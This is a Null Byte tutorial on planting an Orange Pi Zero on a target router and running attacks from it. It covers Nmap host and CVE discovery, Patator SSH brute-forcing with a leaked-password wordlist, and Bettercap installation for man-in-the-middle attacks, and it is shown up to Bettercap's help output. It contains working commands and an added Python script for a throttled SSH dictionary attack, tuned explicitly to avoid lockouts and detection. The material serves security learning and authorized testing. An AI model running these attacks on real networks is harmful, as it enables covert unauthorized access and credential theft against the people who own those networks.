
How to Perform Network-Based Attacks with an SBC Implant «Null Byte :: WonderHowTo



With a tiny computer, hackers can see every website you visit, use services on the network, and reach the gateway of your wireless router to change sensitive settings. Once such a networked implant is attached to the router, these attacks can be carried out from anywhere the attacker has a connection back to it.

The Orange Pi Zero and its Armbian operating system must first be set up for remote access and network-based attacks before you can continue; the operating system is not ready for this out of the box, so be sure to read my previous setup article. This type of attack can also be done with a Raspberry Pi, but the following installation commands were only tested on the Orange Pi Zero.

This article focuses on performing multiple network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks presented here are by no means an exhaustive account of how much damage an attacker can do to a network, but they are a good starting point for showing just how dangerous a network implant can be in the wrong hands.


1. Performing Network Discovery and CVE Discovery with Nmap

Nmap is one of the most important network mapping tools. We can start by installing it on the Orange Pi Zero with the following apt-get command.

  root@orangepizero:~# apt-get update && apt-get install nmap

Then install some useful NSE scripts, such as nmap-vulners and vulscan, as shown in my previous article on identifying CVEs with Nmap scripts. Once these tools are on the Orange Pi Zero, the first step is to identify the IP address, netmask, and route that the target router has handed to the Orange Pi Zero.

  root@orangepizero:~# ip addr

3: eth0:  mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff
    inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
       valid_lft 86056sec preferred_lft 86056sec
    inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link
       valid_lft forever preferred_lft forever

We can see the address 192.168.8.138/24 and can assume that the router is at 192.168.8.1, which can be verified with the ip route command. Next, ping-sweep the entire network (-sn) to discover live hosts.

  root@orangepizero:~# nmap -sn 192.168.8.1/24

Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds

For example, if we find the device at 192.168.8.183 interesting (the one whose vendor Nmap could not identify), we can investigate this host further.

  root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183

Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC
Nmap scan report for 192.168.8.183
Host is up (0.00080s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|     CVE-2018-15919  5.0  https://vulners.com/cve/CVE-2018-15919
|_    CVE-2018-15473  5.0  https://vulners.com/cve/CVE-2018-15473
MAC Address: 48:1C:52:9F:A6:71 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that the nmap-vulners NSE script has matched two CVEs against this particular SSH server. Both are username-enumeration issues rated 5.0, and nmap-vulners matches purely on the version string in the banner, so treat them as candidates rather than confirmed vulnerabilities. The host is almost certainly an Ubuntu machine, and Ubuntu backports security fixes without bumping the upstream version number (the 4ubuntu0.3 suffix is the package revision where such fixes land), so automatic updates have probably already taken care of anything serious.

We could continue to explore this service, or other hosts on the network, with more advanced Nmap scans and scripts. For more on Nmap, see my other Nmap articles on Null Byte.
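As an added example (not code from this article, nor from the Nmap or nmap-vulners projects), the following Python script turns Nmap's XML output (-oX) into per-port findings, pulls the CVE IDs and CVSS scores out of the nmap-vulners script output, and picks the Debian/Ubuntu package revision out of the version banner as a reminder that the match is banner-based. The embedded XML is constructed to mirror the scan above; the gateway's MAC address and its open HTTP port are made up so that a host without script findings is exercised as well.

```python
"""Turn Nmap XML (-oX) into ranked findings, including nmap-vulners hits.

Added example: not the article's code and not part of Nmap or nmap-vulners.
SAMPLE_XML is constructed to mirror the scan above; the gateway's MAC and
HTTP port are made up so a host without script findings is exercised too.
"""
import re
import xml.etree.ElementTree as ET

# One "CVE-ID <cvss> <url>" row inside the vulners script output.
CVE_ROW = re.compile(r"(CVE-\d{4}-\d{4,})\s+(\d+(?:\.\d+)?)")
# Debian/Ubuntu package revision inside a version banner, e.g. "4ubuntu0.3".
DISTRO_REV = re.compile(r"\b\d+(?:ubuntu|\+deb)[\w.]*")

SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -T4 --script nmap-vulners -F -A -oX scan.xml 192.168.8.0/24" version="7.40">
  <host><status state="up"/>
    <address addr="192.168.8.1" addrtype="ipv4"/>
    <address addr="00:00:00:00:00:01" addrtype="mac" vendor="Mediabridge Products"/>
    <ports><port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port></ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.8.183" addrtype="ipv4"/>
    <address addr="48:1C:52:9F:A6:71" addrtype="mac"/>
    <ports><extraports state="closed" count="99"/>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.3" extrainfo="Ubuntu Linux; protocol 2.0">
          <cpe>cpe:/a:openbsd:openssh:7.6p1</cpe></service>
        <script id="vulners" output="&#xa;  cpe:/a:openbsd:openssh:7.6p1: &#xa;&#x9;CVE-2018-15919&#x9;5.0&#x9;https://vulners.com/cve/CVE-2018-15919&#xa;&#x9;CVE-2018-15473&#x9;5.0&#x9;https://vulners.com/cve/CVE-2018-15473"/>
      </port></ports>
  </host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port on each host that is up."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            version = " ".join(v for v in (attrs.get("product"), attrs.get("version")) if v)
            # vulners prints one CVE per row; keep (id, cvss) in the order reported.
            cves = [(cid, float(score))
                    for script in port.findall("script") if script.get("id") == "vulners"
                    for cid, score in CVE_ROW.findall(script.get("output", ""))]
            rev = DISTRO_REV.search(version)
            findings.append({
                "host": addrs.get("ipv4"), "mac": addrs.get("mac"),
                "port": int(port.get("portid")), "proto": port.get("protocol"),
                "service": attrs.get("name", ""), "version": version,
                # A distro revision means fixes may be backported: the CVE match is banner-only.
                "distro_revision": rev.group(0) if rev else None,
                "cves": cves,
            })
    return findings


def rank(findings, min_score=0.0):
    """Findings with at least one CVE scoring >= min_score, highest score first."""
    kept = [f for f in findings if any(score >= min_score for _, score in f["cves"])]
    return sorted(kept, key=lambda f: max(score for _, score in f["cves"]), reverse=True)


if __name__ == "__main__":
    import sys
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for f in rank(parse_nmap_xml(xml_text)):
        caveat = f" [distro revision {f['distro_revision']}: fixes may be backported]" if f["distro_revision"] else ""
        print(f"{f['host']}:{f['port']}/{f['proto']}  {f['service']} {f['version']}{caveat}")
        for cid, score in f["cves"]:
            print(f"    {cid}  CVSS {score}")
```

Run the real scan with -oX scan.xml and pass the file as the first argument. rank(findings, min_score=7.0) drops everything below CVSS 7.0, so the two low-value username-enumeration hits above fall out of the list, which is usually what you want when deciding where to spend time on a network with many hosts.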

2. Patator Brute-Force Attacks

Like Hydra and Medusa, Patator is a highly flexible, fully featured command-line brute-force tool, and it quickly became one of my favorite hacking tools. In my previous article, Patator was used for a dictionary attack against various router gateways, which lends itself well to a network-based attack like this Orange Pi Zero hack. This time, however, I will be showing Patator's SSH brute-forcing module.

First, install the dependencies the Patator Python script requires. There are quite a few packages, so this can take up to ten minutes. Prefixing the command with screen (which should already be installed) is recommended: if the SSH connection drops, screen keeps the installation running, and you can reattach to it once the connection is reestablished.

  root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan
  java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3
  libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1
  libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo
  libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev
  librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0
  libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0
  libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2
  libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11
0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded.
Need to get 112 MB of archives.
After this operation, 312 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Upgrade the setuptools and wheel packages with the following pip command (Patator v0.7 is a Python 2 script, which is why pip rather than pip3 is used throughout):

  root@orangepizero:~# pip install --upgrade setuptools wheel

Collecting setuptools
  Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB)
    100% |████████████████████████████████| 583kB 181kB/s
Installing collected packages: setuptools
  Found existing installation: setuptools 33.1.1
    Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed setuptools-41.0.0

Clone the Patator GitHub repository into /opt/patator with the git command.

  root@orangepizero:~# git clone https://github.com/lanjelot/patator /opt/patator

Cloning into '/opt/patator'...
remote: Enumerating objects: 457, done.
remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457
Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done.
Resolving deltas: 100% (157/157), done.

Change (cd) into the new /opt/patator/ directory.

  root@orangepizero:~# cd /opt/patator/

Then use pip again to install the remaining requirements. This can take up to 20 minutes; the pynacl and cryptography packages took particularly long in my tests, since several of these packages are compiled from source on the ARM board.

  root@orangepizero:/opt/patator# pip install -r requirements.txt

Collecting paramiko (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
    100% |████████████████████████████████| 194kB 216kB/s
Collecting pycurl (from -r requirements.txt (line 2))
  Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
    100% |████████████████████████████████| 215kB 172kB/s
Collecting ajpy (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 5))
  Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
    100% |████████████████████████████████| 61kB 66kB/s
Collecting cx_Oracle (from -r requirements.txt (line 6))
  Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
    100% |████████████████████████████████| 296kB 177kB/s
Collecting mysqlclient (from -r requirements.txt (line 7))
  Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
    100% |████████████████████████████████| 92kB 98kB/s
Collecting psycopg2-binary (from -r requirements.txt (line 8))
  Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
    100% |████████████████████████████████| 378kB 169kB/s
Collecting pycrypto (from -r requirements.txt (line 9))
  Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
    100% |████████████████████████████████| 450kB 114kB/s

...

  Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
  Running setup.py bdist_wheel for bcrypt ... done
  Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
  Running setup.py bdist_wheel for pycryptodomex ... done
  Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
  Running setup.py bdist_wheel for cffi ... done
  Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, pysmi, pysnmp
Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9

When this is done, check that Patator works and list the available modules with the --help option.

  root@orangepizero:/opt/patator# ./patator.py --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
  + ftp_login      : Brute-force FTP
  + ssh_login      : Brute-force SSH
  + telnet_login   : Brute-force Telnet
  + smtp_login     : Brute-force SMTP
  + smtp_vrfy      : Enumerate valid users using SMTP VRFY
  + smtp_rcpt      : Enumerate valid users using SMTP RCPT TO
  + finger_lookup  : Enumerate valid users using Finger
  + http_fuzz      : Brute-force HTTP
  + rdp_gateway    : Brute-force RDP Gateway
  + ajp_fuzz       : Brute-force AJP
  + pop_login      : Brute-force POP3
  + pop_passd      : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login     : Brute-force IMAP4
  + ldap_login     : Brute-force LDAP
  + smb_login      : Brute-force SMB
  + smb_lookupsid  : Brute-force SMB SID-lookup
  + rlogin_login   : Brute-force rlogin
  + vmauthd_login  : Brute-force VMware Authentication Daemon
  + mssql_login    : Brute-force MSSQL
  + oracle_login   : Brute-force Oracle
  + mysql_login    : Brute-force MySQL
  + mysql_query    : Brute-force MySQL queries
  + rdp_login      : Brute-force RDP (NLA)
  + pgsql_login    : Brute-force PostgreSQL
  + vnc_login      : Brute-force VNC
  + dns_forward    : Forward DNS lookup
  + dns_reverse    : Reverse DNS lookup
  + snmp_login     : Brute-force SNMP v1/2/3
  + ike_enum       : Enumerate IKE transforms
  + unzip_pass     : Brute-force the password of encrypted ZIP files
  + keystore_pass  : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack  : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz       : Fuzz TCP services
  + dummy_test     : Testing module

The SSH service discovered earlier can now be brute-forced with Patator's ssh_login module. Use the following command to display the available ssh_login options.

  root@orangepizero:/opt/patator# ./patator.py ssh_login

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login <module-options ...> [global-options ...]

  Examples:
    ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'

Module options:
  host          : target host
  port          : target port [22]
  user          : usernames to test
  password      : passwords to test
  auth_type     : type of password authentication to use [password|keyboard-interactive|auto]
  keyfile       : file with RSA, DSA or ECDSA private key to test
  persistent    : use persistent connections [1|0]

For a more complete list of options and arguments, use ssh_login and --help together.

  root@orangepizero:/opt/patator# ./patator.py ssh_login --help

For demo purposes, I use a wordlist compiled from leaked password databases. It can be downloaded to the Orange Pi Zero quickly with the following wget command.

  root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt

--2019-04-15 02:19:09--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.203.53.176
Connecting to git.io (git.io)|52.203.53.176|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02:19:13--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: '/tmp/simple_wordlist.txt'

/tmp/simple_wordlist.txt 100%[==============================>]  24.99K  59.7KB/s    in 0.4s

2019-04-15 02:19:22 (59.7 KB/s) - '/tmp/simple_wordlist.txt' saved [25585/25585]

Brute-force the SSH service with the following Patator command.

  root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1

INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1     22     2.005 | 123456                             |     1 | Authentication failed.
INFO - 1     22     2.277 | Abcdef123                          |     2 | Authentication failed.
INFO - 1     22     1.344 | a123456                            |     3 | Authentication failed.
INFO - 1     22     1.814 | little123                          |     4 | Authentication failed.
INFO - 1     22     2.081 | nanda334                           |     5 | Authentication failed.
INFO - 1     22     2.023 | N97nokia                           |     6 | Authentication failed.
INFO - 1     22     1.676 | Password                           |     7 | Authentication failed.
INFO - 1     22     2.249 | Pawerjon123                        |     8 | Authentication failed.
INFO - 1     22     2.180 | 421uiopy258                        |     9 | Authentication failed.
INFO - 1     22     2.116 | MYworklist123                      |    10 | Authentication failed.
INFO - 1     22     1.879 | 12345678                           |    11 | Authentication failed.
INFO - 1     22     2.015 | QWERTY                             |    12 | Authentication failed.
INFO - 1     22     1.772 | nks230kjs82                        |    13 | Authentication failed.
INFO - 1     22     2.212 | trustno1                           |    14 | Authentication failed.
INFO - 1     22     1.631 | zxcvbnm                            |    15 | Authentication failed.
INFO - 1     22     2.116 | N97nokiamini                       |    16 | Authentication failed.
INFO - 1     22     2.050 | letmein                            |    17 | Authentication failed.
INFO - 1     22     1.814 | 123456789                          |    18 | Authentication failed.
INFO - 1     22     2.107 | myplex                             |    19 | Authentication failed.
INFO - 1     22     0.042 | tokyoneon                          |    20 | Authentication failed.
INFO - 1     22     2.375 | gm718422@                          |    21 | Authentication failed.
INFO - 1     22     1.613 | churu123A                          |    22 | Authentication failed.
INFO - 1     22     1.914 | abc123                             |    23 | Authentication failed.
INFO - 1     22     1.820 | plex123                            |    24 | Authentication failed.
INFO - 1     22     1.778 | any123456                          |    25 | Authentication failed.
INFO - 1     22     2.048 | Lwf1681688                         |    26 | Authentication failed.

INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s

Patator tries every password in the wordlist (0=) against the given host= and port= for the specified user=, and reports the server's response to each one; the -x ignore:mesg='Authentication failed.' option from the module's usage example hides the misses so that only hits and errors remain. To avoid overwhelming the SSH service with too many attempts per second, use -t to set the number of concurrent threads. The default is ten, but it can be raised or lowered as needed. Against OpenSSH the default is usually too aggressive: sshd limits pending unauthenticated connections with MaxStartups (10:30:100 by default, so it begins randomly dropping new connections once ten are pending), and fail2ban-style tooling bans a source after a handful of failures, so -t 1 trades speed for not being locked out or noticed.
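The following Python module is an added example, not part of Patator or of this article. It reproduces the operational core of what the ssh_login command above does at -t 1: one fresh SSH connection per candidate with a fixed pause in between, and a Patator-style code/mesg pair per attempt, where 'Authentication failed.' is a miss and the server's version banner marks a hit (exactly as Patator's output above shows). The host, user and wordlist path taken from the command line are placeholders; paramiko is a real dependency but is imported only when a live attempt is made, so the throttling and classification logic can be exercised with a stand-in attempt function.

```python
"""Throttled SSH dictionary attack with Patator-style result classification.

Added example; this is not Patator's source. One fresh connection per
candidate, a pause between connections, and a (code, mesg) per attempt:
code 0 = login accepted (mesg is the server banner), 1 = rejected
("Authentication failed."), 2 = no answer (timeout, refused, reset).
"""
import time
from dataclasses import dataclass

AUTH_FAILED = "Authentication failed."


@dataclass
class Attempt:
    candidate: str
    code: int
    mesg: str


def paramiko_attempt(host, port, user, password, timeout=5.0):
    """Try one password over one fresh SSH connection; returns (code, mesg).

    paramiko is imported here so the rest of the module runs without it.
    """
    import paramiko
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=user, password=password,
                       allow_agent=False, look_for_keys=False,
                       timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
        return 0, client.get_transport().remote_version
    except paramiko.AuthenticationException:
        return 1, AUTH_FAILED
    except (paramiko.SSHException, OSError) as exc:
        return 2, f"{type(exc).__name__}: {exc}"
    finally:
        client.close()


def spray(host, port, user, wordlist, attempt=paramiko_attempt,
          delay=2.0, stop_on_hit=True, sleep=time.sleep):
    """Try each candidate in order, pausing `delay` seconds between connections."""
    results = []
    for n, candidate in enumerate(wordlist):
        if n:
            sleep(delay)  # stay under sshd's MaxStartups and fail2ban-style thresholds
        code, mesg = attempt(host, port, user, candidate)
        results.append(Attempt(candidate, code, mesg))
        if code == 0 and stop_on_hit:
            break
    return results


def hits(results):
    return [r.candidate for r in results if r.code == 0]


def errors(results):
    """Candidates that got no verdict; retry these instead of counting them as tested."""
    return [r.candidate for r in results if r.code == 2]


def load_wordlist(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\n") for line in fh if line.strip()]


if __name__ == "__main__":
    import sys
    # Placeholders, e.g.: 192.168.8.183 root /tmp/simple_wordlist.txt
    host, user, path = sys.argv[1:4]
    for r in spray(host, 22, user, load_wordlist(path)):
        print(f"{r.code}  {r.candidate!r:<24} {r.mesg}")
```

Because every candidate uses its own connection, sshd's MaxAuthTries never comes into play; what limits you is MaxStartups and any ban tooling on the target, which is why the pause is applied per connection. Code 2 results are kept apart from misses so a timeout or a dropped connection is not mistaken for a wrong password.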

3. Performing Man-in-the-Middle Attacks with Bettercap

Before installing Bettercap, the Go programming language (Golang) must be installed. Bettercap requires a newer version of Go than the one available in the Debian repositories. To get the latest version, first install the build dependencies.

  root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev

Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.3).
golang is already the newest version (2:1.7~5).
The following additional packages will be installed:
  libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Suggested packages:
  libusb-1.0-doc
The following NEW packages will be installed:
  libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 kB of archives.
After this operation, 1,142 kB of additional disk space will be used.
Do you want to continue? [Y/n]

If you are not already in root's home directory, change to /root/ for the following commands. Using the /tmp directory is not recommended, because on Armbian it is typically a RAM-backed tmpfs, and the Orange Pi Zero may run out of memory during some of the following steps.

  root@orangepizero:~# cd /root/

Then download the tar.gz archive containing the Go binary distribution. The armv6l build runs fine on the Orange Pi Zero's ARMv7 (Cortex-A7) CPU.

  root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'

--2019-04-13 19:52:48--  https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ...
Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 106218905 (101M) [application/octet-stream]
Saving to: 'go1.12.7.linux-armv6l.tar.gz'

go1.12.7.linux-armv6l.tar.gz 100%[==============================>] 101.30M  3.28MB/s    in 34s

2019-04-13 19:53:22 (3.02 MB/s) - 'go1.12.7.linux-armv6l.tar.gz' saved [106218905/106218905]

Next, extract the tar.gz archive into /usr/local.

  root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz

Go's bin directory must be added to $PATH for the following commands to work.

  root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin

Before fetching the Bettercap repository, the available swap space on the Orange Pi Zero must be expanded. Swap is a portion of the disk (here, the SD card) that the operating system uses as overflow memory: when all of the physical RAM (512 MB on the Orange Pi Zero) is in use, pages are moved to swap instead of the build being killed.

To create the new swap space, use dd to write a 2 GB file (2048 blocks of 1 MB) of zeros from /dev/zero. This takes about three minutes.

  root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048

2048+0 records in
2048+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s

Then format the file with mkswap. The "insecure permissions" warning can be ignored for this particular scenario; on a system you care about, you would run chmod 600 /root/swapfile first, since a world-readable swap file lets any local user read memory pages that were swapped out.

  root@orangepizero:~# mkswap /root/swapfile

mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested.
Setting up swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID=e629a001-7a20-4346-8479-4a04fae459af

Enable the new swap space with the swapon command.

  root@orangepizero:~# swapon /root/swapfile

swapon: /root/swapfile: insecure permissions 0644, 0600 suggested.

Verify the new swap space with the free command, which shows the available memory.

  root@orangepizero:~# free -ht

              total        used        free      shared  buff/cache   available
Mem:           493M         84M        9.0M        604K        399M        397M
Swap:          2.2G         19M        2.2G
Total:         2.7G        104M        2.2G

Note that the Swap: line now shows over 2 GB. Back to the Bettercap installation: fetch and build the Bettercap source with the following go command. Be aware that go get builds whatever the repository's default branch holds at that moment, so the version you end up with is not pinned.

  root@orangepizero:~# go get github.com/bettercap/bettercap

Define the $GOPATH with the export command.

  root@orangepizero:~# export GOPATH=/root/go/

Change to the newly created Bettercap directory.

  root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap

Run the make build command. It produces no output on success.

  root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build

Finally, install Bettercap with the make install command.

  root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install

To start Bettercap, use the -iface option to point it at the interface connected to the target router (eth0). Otherwise, Bettercap may attack the devices connected to the Orange Pi Zero's own Wi-Fi hotspot, if one was set up earlier.

Screen is recommended here as well. Bettercap keeps running if you disconnect from the Orange Pi Zero temporarily and reconnect later.

  root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0

bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]

192.168.8.0/24 > 192.168.8.138  »

To get started, use the help command to display the available commands and modules.

  10.#.#.#/24 > 10.#.#.##  »  help

  help MODULE          : List available commands or show module specific help if no module name is provided.
  active               : Show information about active modules.
  quit                 : Close the session and exit.
  sleep SECONDS        : Sleep for the given amount of seconds.
  get NAME             : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
  set NAME VALUE       : Set the VALUE of variable NAME.
